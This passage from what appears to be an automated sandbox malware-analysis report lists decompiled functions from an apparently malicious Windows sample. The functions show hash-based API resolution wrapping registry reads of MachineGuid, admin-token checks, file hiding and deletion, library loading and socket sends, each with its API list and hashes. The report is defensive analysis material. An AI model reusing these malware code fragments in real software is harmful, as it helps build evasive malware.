						_t10 = _t27;
					}
				}
				return _t10;
			}









                                      0x00404a56
                                      0x00404a65
                                      0x00404a6a
                                      0x00404ad1
                                      0x00404ad1
                                      0x00404a6c
                                      0x00404a71
                                      0x00404a79
                                      0x00404a85
                                      0x00404a9a
                                      0x00404a9e
                                      0x00404acb
                                      0x00000000
                                      0x00404aa0
                                      0x00404aac
                                      0x00404abc
                                      0x00404ac1
                                      0x00404ac6
                                      0x00404ac6
                                      0x00404a9e
                                      0x00404ad9

                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 1425999871-0
                                      • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                      • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                                      0x00402bb2
                                      0x00402bc0
                                      0x00000000
                                      0x00402bc0
                                      0x00402bc7

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                      • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                      • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                      • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                      • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 40%
                                      			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                      0x004060c6
                                      0x004060d5
                                      0x004060d8
                                      0x004060f4
                                      0x004060f6
                                      0x004060fb
                                      0x0040610a
                                      0x00406115
                                      0x0040611c
                                      0x0040611e
                                      0x00406121
                                      0x00000000
                                      0x0040612a
                                      0x0040612f

                                      APIs
                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CheckMembershipToken
                                      • String ID:
                                      • API String ID: 1351025785-0
                                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                      0x00403c68
                                      0x00403c70
                                      0x00403c78
                                      0x00403c82
                                      0x00403c8b
                                      0x00403c8f
                                      0x00403c72
                                      0x00403c76
                                      0x00403c76

                                      APIs
                                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                      0x0040643c
                                      0x00406445
                                      0x00406454

                                      APIs
                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InfoNativeSystem
                                      • String ID:
                                      • API String ID: 1721193555-0
                                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                      0x00404eed
                                      0x00404ef2
                                      0x00404efd
                                      0x00404efd
                                      0x00404f07
                                      0x00404f0e

                                      APIs
                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                      0x00403bdd
                                      0x00403beb
                                      0x00403bee

                                      APIs
                                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                      0x0040428a
                                      0x00404297
                                      0x0040429a

                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                      0x00404a27
                                      0x00404a35
                                      0x00404a38

                                      APIs
                                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                      0x00403c4d
                                      0x00403c55
                                      0x00403c58

                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                      0x00403c15
                                      0x00403c1d
                                      0x00403c20

                                      APIs
                                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                      0x00402c2c
                                      0x00402c34
                                      0x00402c37

                                      APIs
                                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                      0x00403bfc
                                      0x00403c04
                                      0x00403c07

                                      APIs
                                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                      0x00403bc4
                                      0x00403bcc
                                      0x00403bcf

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                      0x00404a0d
                                      0x00404a15
                                      0x00404a18

                                      APIs
                                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                      0x00403b72
                                      0x00403b7a
                                      0x00403b7d

                                      APIs
                                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID:
                                      • API String ID: 1174141254-0
                                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                      0x00403fac
                                      0x00403fba
                                      0x00403fbe

                                      APIs
                                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                      0x0040647f
                                      0x00406487
                                      0x0040648a

                                      APIs
                                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                                      0x004058f8
                                      0x00405903
                                      0x00405906

                                      APIs
                                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                      0x00405932
                                      0x0040593d
                                      0x00405940

                                      APIs
                                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
